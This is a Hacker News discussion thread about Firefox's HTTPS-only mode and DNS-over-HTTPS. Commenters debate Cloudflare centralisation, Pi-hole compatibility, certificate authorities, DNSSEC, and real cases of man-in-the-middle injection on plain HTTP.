I think in 2020 we can declare that Californian companies dictate what you can and can't do on your computer, which DNS server to use and what goes through a VPN client and what does not. The same way they decide what is a fact, what is newsworthy and what you are allowed to read / post.


"Eschew flamebait. Don't introduce flamewar topics unless you have something genuinely new to say. Avoid unrelated controversies and generic tangents."

https://news.ycombinator.com/newsguidelines.html


According to you it is a flamebait to have an observation? Ok, understood.


There are infinitely many observations. They don't select themselves. Humans do that, and not for neutral reasons [1].

Your comment was obviously trying to strike a blow for one side of a well-known argument that's going on right now. There are a few problems with that. First, blow-striking is not curious conversation; we can't have both, and HN exists for the latter [2]. Second, these arguments are so well known that the threads they lead to get increasingly predictable as they get more intense [3]. I'm sure you can see how that's bad for curious conversation too.

[1] https://hn.algolia.com/?dateRange=all&page=0&prefix=false&qu...

[2] https://news.ycombinator.com/newsguidelines.html

[3] https://hn.algolia.com/?dateRange=all&page=0&prefix=true&sor...


Fully support this argument and Mozilla's initiative.

I work for a firewall co and we had taken a strategic decision to not allow plaintext traffic onto the internet (from cloud deployments). It's just lazy on the client or server operator's part to not have it so.


this breaks caching of simple objects that do not require content security


Even "simple objects" can be MITM'd. I know I'm on the extreme theoretical edge, and so maybe your perspective is pragmatic enough to pass. But even small images, javascripts, etc. should be protected by HTTPS, not just "sensitive" pages.

As an end user, I don't want the possibility of anything being tampered with along the route. As a content owner / webmaster, I want the same. So publisher and consumer are both aligned in their desire, making HTTPS ideal for everyone except for people reading/manipulating traffic along the way.


speaking specifically of local package caches for things like onsite networks which are themselves signed OOB


From intermediate (MITM) caches, yes. But end-clients can still cache it though.

Our market is more backend API traffic so doesn't impact as much.


Since it's becoming harder and harder to implement transparent proxies and caches, someone should define a local cache protocol so that network administrators can configure explicit shared caches for the devices on their networks.


> someone should define a local cache protocol

Someone did, almost two and a half decades ago. It's called the Internet Cache Protocol.

- Internet Cache Protocol (ICP), version 2 [0]

- Application of Internet Cache Protocol (ICP), version 2 [1]

--

[0]: https://tools.ietf.org/html/rfc2186

[1]: https://tools.ietf.org/html/rfc2187


The browser can still see everything and still cache whatever it wants. Safari and likely others are turning off cross site caching anyway.


HTTP != browser always


I’m surprised at the negative knee-jerk reaction

Increased corporate/government control and centralisation. That is a huge "do not want" for many of the HN crowd, including me.


Honest question. How is this feature enabling increased corporate/government control?


Because now almost every Firefox user will be sending their DNS straight to one centralized provider, a large corporation, which makes them more vulnerable to various kinds of government interference.


There is nothing about DNS over HTTPS that requires you to use one centralized provider, and unencrypted DNS has always been easier for large corporations, ISPs, and the government to sniff.

I think people are just totally off-base on this. The instances of government/corporation reactions to DOH that we have seen suggest that untrustworthy organizations and governments largely oppose the change. They would not oppose the change if it was in their best interest.

Worth noting that anyone can set up a DOH server. You can even set up your own server in your own house and use it the same way that you would a Pi-hole. To the extent that malware providers or IoT providers will use this to circumvent blocks, they already had the ability to do that -- and IoT services like Chromecasts have already experimented in the past with setting their own DNS providers and ignoring network settings.

We do not need to open up our networks to MiTM attacks to avoid centralization. Unencrypted DNS is a bad idea, it isn't complicated.


Firefox made DoH to Cloudflare the default, right?

This is not responsive to my argument that it will impact most Firefox users. Most people won't change their defaults. Defaults matter. And that goes double when you need to dink with your own DNS server to override this crap.


Firefox made DoH default to Cloudflare, but that's because Firefox was the browser that pushed DoH the hardest when it came out, and at the time Cloudflare was (and arguably still is):

a) the best provider available

b) more importantly, the most private provider available

But there's nothing about the technology locking Mozilla into keeping Cloudflare the default in perpetuity, and in any case, the solution to your concern is to adjust the defaults, not to throw out DoH entirely.

There's nothing about DoH in specific that's causing the concerns you have. Mozilla could have set Cloudlfare DNS to be the default even for regular, unencrypted DNS traffic. There's nothing inherent in DNS technology that would force them to respect your OS settings. If your concerned about Cloudflare taking over, rejecting DoH isn't the solution to that problem.

It's not an underhanded centralization push, it just so happens that when DoH was still new, there was effectively one provider that was widely available, that could confidently handle a large upsurge in traffic, and that made extremely strong privacy guarantees compared to the rest of the industry. At the time Mozilla started pushing DoH, most ISPs in the US didn't even offer it as an option at all. As that changes, I expect that browser defaults will change as well.


Cloudflare is the default DoH provider for Firefox only in the US. NextDNS is another option in the the Firefox preferences UI and more options (such as Comcast) are coming soon in the US and internationally. You can also specify a custom DoH provider URL:

https://support.mozilla.org/en-US/kb/firefox-dns-over-https#...


The kind of user who wouldn't change their default setting is probably already happily (or unknowingly) sending all their DNS traffic to their ISP.

I get your concern about cloudflare, but I can tell you right now which of the two options I would trust more with this data, and it's not Comcast/AT&T/Cox/<insert shady ISP here>


No offence, but how is that more centralised than all of your traffic being plainly visible to your ISP, which in many countries cooperate fairly closely with law enforcement and government, if they're not straight up government owned depending on what country you're in? For example in the UK, a fairly liberal country, DoH still is very useful to avoid countless of the ISP level content blocking that happens, not to mention if you're in a place like Russia.

For most users on the planet Cloudflare is a hell of a lot better than your ISP


There are dozens or hundreds of competing ISPs. In the UK I certainly trust A&A a lot more than Cloudflare (who among other things are the #1 provider of fake HTTPS endpoints that send all your data in plaintext across the public internet).


> I’m surprised at the negative knee-jerk reaction.

Only Chrome is allowed to break stuff on the web, remember?


This is optional, so it's not breaking the web. It's like disabling JavaScript manually.


This site is likely to get annoyed at Chrome as well. Also, just because Chrome gets away with it doesn't mean its an action that should be accepted purely for that reasoning.


DoH changes who gets all your DNS traffic from your ISP and your router to (in practice) a single central DoH provider. Which of those you trust least depends on who you are.


There is nothing preventing your ISP from providing DoH itself. Firefox (currently) does not use your ISPs settings by default (which imo is the correct move for now), but Chrome will use your ISP/router's DoH settings if it provides DoH.

There is nothing about DoH that forces you to use a single company.


Can a user use multiple (fallback) DNS-over-HTTPS providers? Do the DoH providers supply fallbacks (which iirc most DNS providers do)?


Depends on the client. Firefox doesn't support a fallback and tries unencrypted or fails depending on how you configured it. AdGuard Home can use fallbacks so you can run a local instance and point Firefox there. Some providers supply fallbacks (https://1.1.1.1/dns-query and https://1.0.0.1/dns-query for example).


HTTPS Everywhere already supports a HTTPS-only mode called EASE, it is opt-in though.


Especially for average users, this is a lot better than the VPN snakeoil I keep seeing ads for.


I like the DoH initiative too. It's sad that Chrome doesn't support it for Linux yet and therefore Brave does not.

HTTPS upgrade feature has always been there in Brave.

Edit: I'm using system-wide DoT at the moment with CoreDNS but it doesn't work that well. Not sure why.


> This doesn’t guarantee the transport is end-to-end secure; I’m sure plenty will strip the encryption at an LB and then possibly send it back over the internet.

Hijacking this a bit - If plenty are stripping the encryption at an LB (like Cloudflare for example), how can you be sure that NSA is not wiretapping in Cloudflare's infrastructure where it is not encrypted? Seems like a really easy way to get unencrypted data and not care about if everything is HTTPS or not.

Are there any counterexamples to this? Do we know that Cloudflare or AWS is not doing this?


Agreed. I've been using this for several versions already (mentioned by other commenters - dom.security.https_only_mode). Very few websites break, and they should know better (e.g. HTTPS redirects to HTTP, redirects to another HTTPS location).

I've often daydreamed of a new HN freature where non-HTTPS links have a preceeding red marker "[HTTP only]" (or similar) but never could find the correct place to write it down. Considering that Firefox is now a minority browser :( perhaps there is still usefulness in this idea?


I have mixed feelings about what you wrote.

100% with you that by itself, browser HTTPS-only mode (even by default) is A Good Thing. In isolation, this is a no-brainer and Mozilla's doing the right call.

I'm not happy with DoH though, at all. I fall in the crowd who wants to control my own DNS on my own devices (and I do realize that for those less technically knowledgeable, the status quo is putting that in the hands of the network admin or even ISP, but at least in principle they have the means to do so if they just figure out how, which is relatively trivial). DoH effectively completely cripples things like pihole. I'd have to start whitelisting IPs/hostnames for port 443 :/

Another practical negative consequence is the further centralization of TLS termination in (most notably) Cloudflare and Akamai, as I am sure this will de the default for those who are now rushed to TLS-enable currently uncompliant endpoints. Great sieves for XEyes and private tracking industry.


I don't understand this criticism at all; could you clarify what the issue is?

None of this - DoH, nor HTTPS-only - is required. It's not even on by default (yet). If you have some specific wishes; it's trivial to pick a different DNS system, or leave https-only off.

Additionally, DoH and https-only aren't really closed or locked in in any way. There's a cloudflare-base DoH option that's used by default, but just as you can pick your own DNS servers, you can also pick your own DoH servers. Sure, it's new (and thus not on by default), so selection is still fairly limited. But even ISPs are starting to offer DoH, and surely others will too. There's no reason to assume that you won't soon be able to pick from several choices for your DoH setup, including local or LAN options.

You mention pihole; and though I've never used it, they do have a page on DoH, and a superficial skim doesn't have any huge issues: https://docs.pi-hole.net/guides/dns-over-https/ - and looks like it's based on code described here https://developers.cloudflare.com/1.1.1.1/dns-over-https/clo... - and that supports upstream and downstream DoH, by the looks of it.

In other words: all change has some friction, but if you want local control: you still have it. The only thing you really lose is the ability for networks to hijack DNS of devices that don't trust it. And that's a feature, right? If you trust the network; sure, use that DNS if you want. But if you don't: better that its easier to avoid control by that network.

What downsides does DoH have?


> None of this - DoH, nor HTTPS-only - is required. It's not even on by default (yet).

I had to disable DoH on all 5 of my machines because it was enabled automatically.

> You mention pihole; and though I've never used it, they do have a page on DoH

pihole supports using Cloudflare as an upstream DoH provider, not acting as a DoH provider.


> I had to disable DoH on all 5 of my machines because it was enabled automatically.

Some googling: it's on by default in the US now, not yet globally.

> pihole supports using Cloudflare as an upstream DoH provider, not acting as a DoH provider.

That's unfortunate; are you sure it's not just a little poorly documentend? At least the underlying software they link to https://developers.cloudflare.com/1.1.1.1/dns-over-https/clo... clearly mentions a proxy functionality, but maybe that's not on yet?

In any case: the point is that just as DNS proxying became easier over time, so will DoH proxying. There's nothing wrong with sticking to old tech as you chose to if it's not yet convenient for you to switch; especially if pihole supports upstream DoH, since presumably you trust the network between your device and your pihole ;-) - rendering the rest of the DoH benefits moot.

I'm sure time will resolve issues like that, but in the meantime, the vast majority of people that didn't customize their DNS and don't choose at all, or choose based on privacy or performance get a more private & secure option by default. I mean, it's transition pains are annoying, but it sounds like a good idea in general, so I suppose the transition costs are worth it in the long run, especially since the vast majority of users won't even notice. It's annoying to be in the camp that gets to bear the burden, for sure.


My objection is that the change was made without notice or explicit permission, and changed the chain of trust. Mozilla decided that I should trust Cloudfare and that I should not trust my own network or the corporate network.


Yeah, the rollout (as opposed to the feature) sounds poor. Since I didn't experience this - you're saying you upgraded FF and without notice your DNS settings were replaced? I.e. anything only resolvable on your LAN suddenly stopped working? That's pretty annoying to debug!


That's indeed what happened but only for US users.


Not OP. Did we ever allow browsers to set their own DNS server for plain DNS requests? (Let's ignore IE and it's mess of mixing OS settings + browser settings a la "Internet Settings").

For me at least, the biggest criticism of DoH is that it's not necessarily a centralized config at the OS level and seems to be a step in the direction of the general theme "Browser As Your OS".


Firefox DoH easily works with DNSCryptProxy. https://github.com/DNSCrypt/dnscrypt-proxy/wiki/Local-DoH

You can easily set it up to contact that, but enable some exclusions for specific domains if you wish to fallback to pihole.

It's probably not that efficient anyway to be using pihole's filtering in Firefox compared with just ublock origin anyway.


> It's probably not that efficient anyway to be using pihole's filtering in Firefox compared with just ublock origin anyway.

Pihole operates at the network level. It can block Windows Telemetry, ads on your Roku, smart devices trying to phone home, etc. Any guest devices that connect to your network also benefit without you having to install blockers on them.

It's not a replacement for ublock, it's used in conjunction with it.


Yea, I understand that which is why I keep pihole.

My argument though is in the context of Firefox, in which case the benefit of the pihole bit is dubious when you can install ublock origins. Pihole doesn't provide much additional benefits that can't be achieved with ublock origin advanced filters.

Granted someone could argue what would be the benefit of using the dnscrypt-proxy at that point. In that context, you benefit from better privacy (DNS requests aggregated) and caching benefits.


Your Pi-hole working on other people's devices is a bad thing. After all, there's nothing stopping you from configuring your Pi-hole to filter political content you disagree with instead of just ads, trackers, and malware.


> Your Pi-hole working on other people's devices is a bad thing.

No, it isn't. Never mind the fact that that isn't how PiHole works, I'm perfectly within my right to control how my home network functions.


I wasn't aware of this part of dnscrypt-proxy, thanks for sharing. I find network-level blocking and browser extensions work complementary.

In a broader sense, I guess the larger concerns is malware and trackware on various devices where DoH is used maliciously. Especially smartphones. Granted there is nothing stopping them today, but the normalization of DoH will put it in arms reach for everyone.


I just hope we don't get compromised CA because a lot of governments currently try to fight encryption.

But agreed, it is a good idea. The only disadvantage I see is that some sites might not want to pay for a certificate and don't know how to easily obtain free ones. So it might kill some sites.


They don't need compromised CA, you can mandate all devices in your country to install your root cert, good part it failed:

https://www.privateinternetaccess.com/blog/kazakhstan-tries-...


Not 100% sure why this is being downvoted, I think it is true that some sites, for one reason or another, probably will not adopt ACME/Let's Encrypt...


Could this or HTTPS Everywhere warn you when a site is known for encryption stripping? I think this happens on the free cloudflare tier and we can’t determine that.


How would you detect something like that? Thats at the discretion of the party running the webserver/service and it's not directly observable. Cloudflare acts as a reverse proxy in front of the real origin server (which uses https), but that affects really a lot of internet sites nowadays (Cloudflare, Akamai, aws/gcp/azure and so on). CDN-origin connectivity is also encrypted, afaik you cannot downgrade and strip ssl (at least not with Akamai)


All HTTPS does is ensure security between your client and the server with the private key of the certificate. You typically trust certificate signers (globalsign, letsencrypt, etc) who have their own policies for ensuring who gets a certificate (in LE's case you have to prove ownership of the domain)

If a domain owner gets a certificate and gives it, and a private key, to a third party, then that's their business.


> All HTTPS does is ensure security between your client and the server with the private key of the certificate.

Just for completeness, HTTPs does not necessarily guarantee you are connected to the right server. This depends on the CAs you trust.

For example, larger enterprises commonly inject their own CA into their workstations in order to prevent loss of sensitive data. This allows SSL inspection proxies to terminate all SSL connections with a valid, trusted certificate from the perspective of that workstation. .


I just briefly played with it and there is an option to enable this mode globally and exclude specific sites (permanently or temporarily). Which is exactly what i needed.


Great to see this built into firefox, I have been using HTTPS Everywhere https://www.eff.org/https-everywhere to achieve similar results, it won't warn you if it is not https (i think) but it will try and upgrade to https if it can. It is available for chrome and firefox.

What particularly annoyed me was using http to sites which supported https.


I remember years ago when Facebook wasn’t using https and a bunch of articles came out with how to access someone’s account if you’re both on unencrypted public wifi. Since then I’ve been a fan of https everywhere


IIRC this was around the time when someone created Firesheep [0] which made it really easy to steal unencrypted session cookies via packet sniffing, which sparked all those articles you are talking about.

[0]: https://en.wikipedia.org/wiki/Firesheep


For me at least it warns me very blatantly and I have to asked to go to an insecure site if it's HTTP only. Perhaps we don't have the same configuration.


That's not enabled by default, you first have to flip the "Encrypt All Sites Eligible" switch.


IIRC HTTPS Everywhere works by having a whitelist of domains that are also accessible over https, and switches to https for those.

So if a site isn't in the whitelist, it won't modify the request in any way.


HTTPS Everywhere will attempt to connect to a site using SSL, and if that times out will pop out an error message and allow you to load the site over HTTP temporarily. At least that's how it works on Firefox + latest version of the extension.


Only if you have the "encrypt all elgible sites" option enabled, which is disabled by default.


HTTPS Everywhere already supports a HTTPS-only mode called EASE, it is opt-in though.


As others pointed out, you can set it up to always upgrade to HTTPS and warn you when it's not supported. But that's not gonna work all the time: some websites will have self-signed certificates (which is better that nothing I guess), some will return 403 or 404 (for HTTPS only), some will just not load after trying for half a minute.


The Brave browser has this feature built-in, by the way (Settings > Shields > Upgrade connections to HTTPS [X])


awww crap - I've got loads of low-traffic websites that don't need https[1] that I'm now going to have to spend time sorting out certificates for.

To be honest, it's about time that cert enablement is built into all web server configs (on all OSs) as a native feature instead of having to manually roll the config using this-weeks-currently-preferred letsencrypt script.

---

[1] Yes, yes, I know everyone on HN prefers everything to be https, but out in the real world, most people don't care if all they are doing is browsing for information.


The main problem with keeping sites http is that someone in the middle can modify the content and inject arbitrary code, be it ads, crypto mining or just a redirect to a worse website.

Therefore I believe it should be a social duty to make everything https so as to ensure that we don’t create something that can be used to harm others.

I didn’t use to think like this until I actually tried it out by going to a mall and doing it myself. Whoever was accessing simple http websites for the very short end of a stick (metaphorically speaking)


Funny how "security experts" here complain about accidental non-repudiation misfeature of DKIM, but apparently being forced to do a bunch of crazy crap HTTPS forces you to do when all you need is content signature verification is perfectly fine with those same people. Security is becoming a field dominated by some bizarre corporate ideology.


I don't understand your point, content signature verification would have the same consequences that HTTPS for non-repudiation, no?

Also it's really different from DKIM: the problem with DKIM is that since the signature is part of the email itself, so unless the receiver bothers to strip it (why would they?) then it's stored forever in the metadata, even though arguably its use as an anti-spam feature stops being relevant once it's been delivered to the MUA. So basically every time you send an email through gmail you effectively also send a signature saying "I, Google, vouch that h4x0r@gmail.com did send this email" and the receiving end will keep this signature for as long as they keep the email.

HTTPS session keys however are not typically saved unless somebody goes out of their way to do it. As such it's a lot less likely to be used for blackmail in hindsight. In general people use archive.org to prove that some content used to exist in this scenario, not old HTTPS session dumps.

And like for DKIM the solution is fairly trivial if it's really an issue: every time you rotate your keys (which should be fairly frequent if you use something like letsencrypt) be sure to make the expired private keys available publicly to give you plausible deniability.

I have yet to hear a good argument against HTTPS everywhere honestly, it generally boils down to "but I don't want to do it" with some weak post-hoc justification for why it's bad.


It’s perfectly fine only to the people who already did it; there are visibly annoyed comment from people who haven’t yet because they think it’s pointless, too. The same issue exists with DNS-over-HTTPS: most people don’t want to have to take new and extra steps to monitor DNS traffic in their home or work, and the concept of having to do that work varies from annoying to offensive (whether they use them or not).

DNS-over-HTTPS is one in a long series of decisions that contradict the assumption that network operators deserve cleartext access to your traffic. I suppose we can thank the NSA’s Room 641A for inspiring the tech world to pivot to this view all those years ago. It’s finally reaching critical mass, and endpoint network operators are furious at having their sniffing/spying capabilities hindered.

Captive WiFi portals are next on that list of institutions that are at risk of failing. I can’t wait, personally.


What "crazy crap" are you talking about? I get that HTTPS might be overkill for some situations, but it's not difficult to use and every client device supports it. If you came up with your own signature-but-no-encryption protocol (maybe something similar to DKIM, actually?), nobody would support it. Even if they did, I'm sure that some people would use it when HTTPS is a better solution, just because they don't understand the tradeoffs.

A standardized overkill solution that covers most use cases is probably better than n+1 standards with different tradeoffs.


I'm not sure if that "security expert" note is pointed at me (I have not talked about DKIM at all, nor do I consider myself a security expert by any means).

I'm merely pointing out what is in my humble opinion, even when no sensitive data is traveling, the main reason why HTTPS should be everywhere. If you believe there are other easy to deploy and maintain solutions with the same amount of relevant user outreach, then by all means suggest them.

(I could of course point other reasons, like the fact that even if your website has no sensitive data it can still be scraped to build a profile of the visitor by a third party, etc).


Doing content signature verification securely would require all the same "crazy crap" that HTTPS does (certificates, CAs, OCSP, ACME, etc). The PKI is the hard part; once you have that there's very little reason not to encrypt as well as sign.


True. Take away 20 or so of their IQ points, and the same people would be working for Uncle Sam, groping travelers at the airport.


I would love to see a version of www.paulgraham.com covered in FB ads for jobs at megacorps...


I've seen this said in several spots and I am curious. Could you point me to a resource that teaches me how to do this with a HTTP website please? I have no experience in doing this and am very interested to learn. Thanks in advance!


The answer to your question will depend on the set of technologies that you are using, but a great place to start is the EFF's Certbot[1]. Certbot will, for many common web servers, verify your servers' domain address and install a cert that will work for ~3 months. It's free and mostly automated.

I've been getting certs for all of my side projects and it takes about ~10 minutes each. Highly recommend.

[1] https://certbot.eff.org/


Oh wait I didn't out across what I wanted. I meant how do I do a simple "attack" on a http website that's at a mall as OP said. I know how to use certbot for the certificates, (thank you Digital Ocean docs).

I was wondering. If I run a simple http page on my home network, how can I, from another device, change it or make another client get a modified page with the same address?


I think they are referring to ARP cache poisoning.

Or maybe Wi-Fi promiscuous mode packet sniffing, but that's a read-only attack.


there is a middle ground of authenticating traffic without encrypting it - c.f. IPSEC AH mode - granted this type of thing isn't in HTTP but easily could be


What would be the advantage of that? Saving a few CPU cycles, maybe?


> The main problem with keeping sites http is that someone in the middle can modify the content and inject arbitrary code

I keep hearing this as a plausible excuse, yet I've never seen any proof of such.

non-https does make it possible but has anyone got any source where someone has been victim of such attacks?


> has anyone got any source where someone has been victim of such attacks?

Yes, the most well-known victim was GitHub. A malicious MITM injected JavaScript code into an unrelated non-HTTPS page, making browsers which visited that page do a DDoS attack against GitHub. Quoting https://arstechnica.com/information-technology/2015/04/meet-... "[...] The junk traffic came from computers of everyday people who browsed to websites that use analytics software from Chinese search engine Baidu to track visitor statistics. About one or two percent of the visits from people outside China had malicious code inserted into their traffic that caused their computers to repeatedly load the two targeted GitHub pages. [...]"


ISPs in the US have been doing it for years: https://www.infoworld.com/article/2925839/code-injection-new...


I did it myself for fun while I was in high-school, it's quite a trivial thing actually.

Just need to be on the same network as the victim and do some ARP spoofing to make your computer the gateway for that network.


A cursory search returns many examples, for instance : https://www.privateinternetaccess.com/blog/comcast-still-use...


First link, Kazakhstan even tried to MITM people with HTTPS, second injecting ads by ISP.

[1]https://www.privateinternetaccess.com/blog/kazakhstan-tries-...

[2]https://security.stackexchange.com/questions/157828/my-isp-b...


Kazakhstan did not do that to inject ads. I believe that they wanted to block webpages on a granular level (for example some specific blogs). Right now they block complete websites, because it's not possible to find out which URL user is visiting.


I read your parent as giving two separate examples.


Other have pointed it out, but ISPs (especially on mobile, at least in portugal) often do this. They add a little banner on the top to tell you some random bullshit about their data plan or some other such shit they want to sell you.

As for attacks, others have pointed out examples as well, and I can assure you you can go far with them (and often with some simple social engineering).

HTTP is just a no-no for me as a developer.


Therefore I believe it should be a social duty to make everything https so as to ensure that we don’t create something that can be used to harm others.

Those who give up freedom for security deserve neither.


That quote is often taken badly out of context.

Benjamin Franklin, to the legislature of Pennsylvania, on the topic of basically letting the Penn family buy their way out of paying taxes indefinitely by providing enough hired mercenaries to protect the colony's frontier during the French and Indian war.

The freedom he was talking about was a legislature's freedom to govern.

The temporary security he was talking about was hired guns.

And none of it applies to the question of the tragedy of the commons that is "HTTP protocol is default embarrassingly insecure."

Indeed, if I were to torture the quote enough to make it fit, it looks more like "Those who would give up essential Liberty (Mozilla, in this case, to design the user agent the way they think best benefits their users and the World Wide Web as a whole) to purchase a little temporary Safety (... of their user count by delaying inconveniencing users in the corner cases where HTTPS can't be used), deserve neither Liberty nor Safety." But it barely fits.


What freedom do I give up by adding HTTPS to my website?


Nobody's saying you should be required by law to use HTTPS. Voting is a social duty too and it's not mandatory.


The world would be a better place if voting was mandatory ( like it is in Australia ).


Agree to disagree. I've met enough Americans to believe that if we made voting mandatory, we'd just end up with Optimus Prime at the top of the ticket.

You can make an act compulsory on the whole population but you can't legislate duty-of-care upon the whole population.


Voting should be mandatory but the first listed option for every office should be "I approve of no candidate and think none of them should win" (the disaffected vote), and the second listed option should be "I approve of every candidate and don't care who wins" (the apathetic vote). With our current system it's impossible to tease out how many voters are disaffected vs apathetic vs simply disenfranchised (in the above scheme, those who don't make it to the polls at all), which makes it impossible to confirm or deny that any candidate has the mandate of the people.


Technically those options are trivial with a non-defective system like approval voting, but assuming you're stuck with first-past-the-post, that's pretty much correct.


Not quite, even with normal approval voting there's no way to distinguish between voters who want to say "all these options are undesirable and everything is broken" and those who want to say "life is good, I'm cool with whoever" and those whose votes get lost or obstructed. The reason why the notion of a "protest vote" is so pointless under our current system is specifically due to the indistinguishability of the first from the latter ("people didn't stay home because they didn't like the candidates, they stayed home because they're so content!"). Additionally without mandatory voting it's difficult to determine where and how voter disenfranchisement is happening, but at the same time it would be unethical to force someone to cast a vote without giving them the option to voice discontent with the options.


What definition of "approval voting" are you using? I'm talking about a ballot where each candidate is marked "approve" or "reject". With that system, "all these options are undesirable and everything is broken" is reject-all, while "life is good, I'm cool with whoever" is approve-all (and lost or obstructed is obviously no ballot at all; there's not much you can do about that).



In the United States, it's considered a social duty but isn't mandatory.


If you're ok with fronting your sites with Cloudflare you can get "fake" HTTPS by using the flexible option (HTTPS from the client to Cloudflare, and HTTP from them to your server)

This satisfies the need to be on HTTPS, without actually having to change anything in your server.

Not saying this is ideal, but for websites that don't _need_ it it could be the best/easiest approach.


It doesn't completely block users from your site. It just makes them extra aware that any middleman will be able to see what they are reading, see anything they send and could possibly modify the traffic.

If you are concerned about the power-users who enable this being aware of these facts then maybe you do need https after all.

(Of course I suspect this mode will be made the default at some point, but that is probably at least a couple of years off.)


Take a look at Caddy server. Every site is configured for https by default with auto-renewed letsencrypt certificates. It even has an nginx-compatible configuration (but I think you'll like it's own (really simple) config more)


I'll check it out - cheers!


> about time that cert enablement is built into all web server configs

It feels like we're slowly getting there! +1 for Caddy for making HTTPS a surprisingly pleasant process. My home router and NAS also support (and enable) Letsencrypt out of the box, which was a nice surprise.


I route my domains through cloudflare for this reason. Just makes life easier for my <1k visitors/month sites.


This is incredibly bad for the health of the web. In kneejerk response to the invasion of privacy from world governments we're handing absolute control of the web back to those very governments.

Everyone being forced to get permission from a centralized cert authority that is easily influenced, pressured, etc in order to host a visitable website is the end of the web as we know it. This is a slide into a total loss of autonomy.

I give it about 3 years before all commercial browsers stop allowing you to visit HTTP sites at all and Firefox only allows if you use their unstable beta build.

At that point you won't be able to host a visitable website without getting permission from someone else. And that's the end of the personal web.


I think you misunderstand how HTTPS works, there's no central root CS, nothing stops you from adding other trusted root certificate authorities.

In fact, your browser trusts a few dozens of different ones, and companies routinely manage their own.


No, I'm just assuming that you're going to follow through on that thought and realize statistically no one does that for self signed certs except corporations which aren't human persons anyway.


The point isn't that you can run it yourself, it's that there isn't a central one and there are dozens or hundreds of different options already, based in different countries.


Firefox HTTPS-Only Mode is not enabled by default. The mode just shows the user an interstitial warning when navigating to non-HTTPS sites; the user is not blocked from visiting non-HTTPS sites.


One change I'd like to see in browsers is when the user enters a domain without protocol in the url bar it interprets that as https instead of http.


This is exactly the https mode.


I don't think so. My proposed change only affects manually entered urls without protocol/schema. HTTP urls (entered manually or from links) would still work as expected, while https mode blocks them. I believe this change is small enough that they can make it the default, while http mode will likely remain optional for several years.


They can't make it the default yet without breaking a lot of things since a bunch of marketing people decided to break the security properties of TLS by using HTTP only vanity redirect domains. While I've found HTTP-only to be most common, sometimes these redirects do support HTTPS but hand out the main site certificate without updating it to include the vanity domain, resulting in a certificate error (however, this new built in HTTPS only gives you a HTTP warning in this case rather than a certificate error, unlike HTTPS Everywhere's EASE). Some sites also have HTTP only redirect from example.com to www.example.com.


The difference is what happens if you type http manually.


Or click on an http:// link


I tried out the "HTTPS Everywhere" Firefox extension but found it cause me more trouble than it was worth, then found "HTTPS By Default" which suits my use much better. It automatically requests all awesomebar requests to https:// by default; one can manually use http:// to bypass it.


That would break tons of intranet applications for many enterprises.


I hope they aren't going to force users in https-only in the future. Software shouldn't cut off legacy content (old websites that aren't going to be upgraded with https) something just because in theory it is more secure. If someone is surfing the web as an adult he is responsible of himself. Other than this there are historical components (web firewalls) that aren't going to work anymore .. so security is a matter where it is an interest of someone (certificate sellers?)


Because browsers run code, they exist in that tricky space where some design decisions have to be made for the good of the commons.

If you visit an HTTP site and get MITM'd, it's not just that the attacker can put you at risk by spoofing a credential input box; it's that the attacker can put third parties at risk by having your browser XMLHttpRequest as fast as it can at at someone else's site to try and DDOS them.

At that point, the calculus shifts and we see a world where user-agent engineers have to make decisions like Microsoft did (to start forcing people to install security patches to the most popular OS on the planet, because we have enough evidence from human behavior to know that at some point, forcing-via-inconvenience becomes necessary).

HTTP is fundamentally broken in that it can be abused to damage the network itself, and even though it's a deeply entrenched protocol, it's one that people have to be backing towards the exits on for that reason.


I think your comment goes specific, but i was talking generally. I don't really understand if you are arguing against my opinion.. I don't know what to respond.. bye


The feature has an allow-list so you can configure your sites the way you want.


yes, my statement was "i hope they aren't going to force this for everyone in the future"


Hot take: HTTPS-only mode is a bad idea if it is not paired with first-class support for self-signed certificates authorized using DANE+DNSSec. It just forces everyone to use broken/redundant CA model.


Can you articulate precisely the problem you believe this will solve? From my perspective it seems like it’s just making the system more fragile and harder to fix since DNSSEC requires OS updates to improve, while not meaningfully preventing state-level attacks.


The current number of CAs does not prevent state-level attacks either.

DNSSEC works I don’t really get that point.

The “root of trust” problem is hard to solve. I kinda hear the DANE guys’ argument, I’d rather trust one authority than a thousand.


> The current number of CAs does not prevent state-level attacks either.

Right, so the question is why we should put a huge amount of effort into implementing and operating a system which doesn't make significant improvements.

> DNSSEC works I don’t really get that point.

It's mostly a layering question: if a new cryptographic algorithm is released or a problem with an old one comes out, browsers can update very quickly. Updating the operating systems and network hardware which implement DNSSEC takes considerably longer. DNSSEC lingered on 90s crypto for ages, key rotations were put off for years, etc. because everyone in this space has to be extremely conservative. That has security implications as well as delaying most attempts to improve performance or usability.

Similarly, browsers can have extensive UI and custom validation logic for HTTPS. A lot of that information isn't present if you use DNSSEC without implementing your own resolver, so you get generic error messages and you don't get control over the policies set by your network administrator. This is especially interesting both as a risk if you don't trust your ISP or for dealing with compromises — if I compromise your DNS server and publish DNSSEC records with a long TTL, your users are at risk until you can get every ISP with a copy to purge the cached records ahead of schedule.

All of those issues can be improved but it's not clear that there's enough benefit to be worthwhile.

> The “root of trust” problem is hard to solve. I kinda hear the DANE guys’ argument, I’d rather trust one authority than a thousand.

This is the best argument for DNSSEC but it's not clear to me how much difference it makes in practice when you're comparing the still nascent DNSSEC adoption to modern TLS + certificate transparency which also catches spoofing and is far more widely implemented.


Kinda off-topic, but I wonder if the adoption of DNS-over-HTTPS will eventually solve the ossification problem you're referring to by moving DNS resolution to the application level.


It can definitely help since you're removing the network operator from the critical path. Large enterprises and ISPs are, not without reason, very conservative about breaking legacy clients but a browser vendor only has to worry about their own software in the release they ship DoH in (with some caveats they've addressed about internal split-view DNS, etc.) so they don't have to deal with complaints if, say, including an extra header breaks 5% of old IoT devices which haven't had an update in a decade.


You can't pair a capability of the web server with a client browser...


I think you haven't bothered to try this out:

- An error is presented only if the host offers HTTP _and_ HTTPS. - There's a nice button to just skip it and view the plain HTTP page.


Finally! I've been waiting for HTTPS to be the default for a while now. From a security standpoint it's annoying that bar something like HSTS it's trivial for a man in the middle to force a downgrade to non-secure HTTP. The fix is to force yourself as a user to look for the lock symbol in the address bar, but that's terrible from a usability perspective.

However, I'm not sure whether it'd be best to make this the mode the default for everyone. I imagine regular users would be quite scared/confused when encountering such a message, and that might lead to lots of valuable (mostly older) websites still running plain HTTP to be effectively cut off.


The real and true bothersome part, is that Firefox (and others) do not seem to allow permanent exceptions.

Going through multiple prompts, each and every time someone wants to do what they want, is problematic.

